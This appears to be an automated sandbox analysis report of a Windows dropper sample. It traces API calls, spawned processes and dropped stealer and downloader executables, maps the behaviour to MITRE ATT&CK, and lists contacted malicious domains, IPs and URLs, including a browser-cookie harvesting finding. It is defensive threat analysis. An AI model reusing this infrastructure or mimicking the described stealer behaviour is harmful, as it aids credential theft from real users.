Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00ED3E2A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_01289B5E SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_01289B8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_10086DCE SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Code function: 15_2_6FEDFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Code function: 15_2_6FEE52CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Code function: 17_2_0006EEB3 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Code function: 17_2_0006F07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Code function: 17_2_000784EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Code function: 17_2_0006ED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_0042202E SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_004230F5 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Memory allocated: page read and write | page guard
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_0043916A LogonUserW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Process created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: aliens.exe, 00000013.00000002.507373439.0000000000482000.00000002.00020000.sdmp, 85F91A36E275562F.exe.19.dr Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC6951 cpuid
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: GetLocaleInfoW,GetNumberFormatW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,RtlDecodePointer,GetLocaleInfoEx,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: LdrInitializeThunk,EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,LdrInitializeThunk,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,LdrInitializeThunk,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: LdrInitializeThunk,EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _GetPrimaryLen,LdrInitializeThunk,EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _GetPrimaryLen,LdrInitializeThunk,EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: GetLocaleInfoW,GetNumberFormatW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: GetLocaleInfoA,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibClr.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\tmp.edb VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d.jfm VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformation
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED273E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01290004 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,LdrInitializeThunk,__malloc_crt,_strlen,LdrInitializeThunk,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,LdrInitializeThunk,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC2B26 GetVersionExW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe -- Code function: 15_2_6FEA94C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe -- Code function: 19_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 2 | Native API 1 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 21 | OS Credential Dumping 1 | System Time Discovery 12 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Command and Scripting Interpreter 3 | Application Shimming 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 31 | File and Directory Discovery 4 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Create Account 1 | Application Shimming 1 | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 57 | SMB/Windows Admin Shares | Input Capture 31 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Valid Accounts 2 | Valid Accounts 2 | Install Root Certificate 1 | NTDS | Query Registry 2 | Distributed Component Object Model | Clipboard Data 2 | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Bootkit 1 | Access Token Manipulation 21 | Software Packing 24 | LSA Secrets | Security Software Discovery 271 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Process Injection 12 | Timestomp 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 4 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading 1 | DCSync | Process Discovery 4 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 2 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Valid Accounts 2 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Modify Registry 1 | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Virtualization/Sandbox Evasion 4 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Access Token Manipulation 21 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Process Injection 12 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement
Trusted Relationship | Python | Hypervisor | Process Injection | Bootkit 1 | Web Portal Capture | Cloud Groups | Attack PC via USB Connection | Local Email Collection | Standard Application Layer Protocol | Internal Proxy | | | Internal Defacement

Behavior Graph

Behavior Graph ID: 324174 | Sample: KeJ7Cl7flZ.exe | Start date: 28/11/2020 | Architecture: WINDOWS | Score: 100

(Graph image not reproduced; its node contents are listed below as text.)

Sample-level DNS/IP: www.evograph.ro; jojo-soft.xyz; 7 other IPs or domains
Sample-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for dropped file; Multi AV Scanner detection for submitted file; 10 other signatures

Process tree:
  KeJ7Cl7flZ.exe (9) started
    dropped: C:\Users\user\AppData\...\ubisoftpro.exe (PE32); C:\Users\user\AppData\Local\...\hjjgaa.exe (PE32); C:\Users\user\AppData\Local\...\file1.exe (PE32); 6 other malicious files
    jg2_2qua.exe (12) started
      DNS/IP: 101.36.107.74 port 80, local port 49732 (UHGL-AS-APUCloudHKHoldingsGroupLimitedHK, China); iplogger.org 88.99.66.31 port 443, local ports 49733, 49737 (HETZNER-ASDE, Germany)
      dropped: C:\Users\user\Documents\...\jg2_2qua.exe (MS-DOS)
      signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Drops PE files to the document folder of the user; Tries to harvest and steal browser information (history, passwords, etc)
    Setup.exe (17) started
      dropped: C:\Users\user\AppData\Local\...\setup.exe (PE32); C:\Users\user\AppData\Local\...\SibClr.dll (PE32); C:\Users\user\AppData\Local\...\Sibuia.dll (PE32); C:\ProgramData\sib\...\SibClr.dll (PE32)
      signatures: Machine Learning detection for dropped file
      setup.exe (21) started
        dropped: C:\Program Files (x86)\...\aliens.exe (PE32)
        signatures: Antivirus detection for dropped file
        aliens.exe (29) started
          dropped: C:\Users\user\...\85F91A36E275562F.exe (PE32)
    002.exe (19) started
      WerFault.exe (25) started
      WerFault.exe (27) started


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
KeJ7Cl7flZ.exe | 67% | Virustotal |
KeJ7Cl7flZ.exe | 79% | ReversingLabs | Win32.Downloader.Upatre
KeJ7Cl7flZ.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | 100% | Avira | HEUR/AGEN.1139239
C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | 100% | Avira | TR/Siggen.lhhpy
C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | 100% | Avira | TR/Crypt.CFI.Gen
C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe | 100% | Avira | TR/Crypt.CFI.Gen
C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe | 100% | Avira | HEUR/AGEN.1134829
C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | 100% | Avira | TR/AD.PredatorThief.gldkk
C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe | 100% | Avira | TR/AD.JamkeeDldr.gwmgy
C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe | 100% | Avira | TR/AD.ColtyStealer.mwfxd
C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe | 100% | Avira | HEUR/AGEN.1138531
C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exe | 100% | Avira | TR/Kryptik.ijozo
C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | 100% | Joe Sandbox ML |
C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | 100% | Joe Sandbox ML |
C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
15.2.Setup.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1139321
19.2.aliens.exe.2f00000.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
26.0.jg2_2qua.exe.400000.0.unpack | 100% | Avira | TR/Crypt.CFI.Gen
15.0.Setup.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1139321
1.2.002.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
jojo-soft.xyz | 9% | Virustotal |
evograph.ro | 7% | Virustotal |
trueaerned.com | 1% | Virustotal |
7553014bd6a4211b.xyz | 5% | Virustotal |

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Reputation
jojo-soft.xyz | 104.31.72.130 | true | true | unknown
iplogger.org | 88.99.66.31 | true | false | high
ip-api.com | 208.95.112.1 | true | false | high
evograph.ro | 89.40.17.17 | true | false | unknown
trueaerned.com | 198.98.57.54 | true | false | unknown
7553014bd6a4211b.xyz | 172.67.157.133 | true | false | unknown
p421ls.xyz | 104.31.90.245 | true | false | unknown
g.msn.com | unknown | unknown | false | high
www.evograph.ro | unknown | unknown | true | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://101.36.107.74/seemorebty/il.php?e=jg2_2qua | false | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

                                                                        high
                                                                        https://iplogger.org/2WX9q6ubisoftmorehttps://iplogger.org/2WN9q6ubisoftablehttps://iplogger.org/2W6ubisoftpro.exefalse
                                                                          high
                                                                          https://iplogger.org/ZdnY7jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.480069462.0000000000724000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://101.36.10https://www.instHjg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            low
                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sSetup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://crl.comoZjg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://iplogger.org/1TW3i7askinstall21.exefalse
                                                                                high
                                                                                https://iplogger.org/1q6Jt7askinstall21.exefalse
                                                                                  high
                                                                                  http://7553014bd6a4211b.xyz/info/waliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                                                                    unknown
                                                                                    http://ffdownload.online/business/receive002.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://nsis.sf.net/NSIS_ErrorErrorSetup.exe, 0000000F.00000000.288312686.0000000000409000.00000002.00020000.sdmp, Setup.exe.0.drfalse
                                                                                      high
                                                                                      https://contextual.media.net/jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://ocsp.pki.goog/gsr202jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookiejg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://pki.goog/repository/0jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://crl.comoUjg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtjg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://iplogger.org/1OXFGaskinstall21.exefalse
                                                                                            high
                                                                                            https://iplogger.org/1Ka7t7askinstall21.exefalse
                                                                                              high
                                                                                              http://www.msn.com/jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://iplogger.org/1bV787askinstall21.exefalse
                                                                                                  high
                                                                                                  http://www.msn.com/de-ch/?ocid=iehpjg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tSetup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gjg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://iplogger.org/1lC5gaskinstall21.exefalse
                                                                                                        high
                                                                                                        https://www.airbnb.cn/account-settingsubisoftpro.exefalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://7553014BD6A4211B.xyz/Laliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://7553014bd6a4211b.xyz/0aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svgjg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
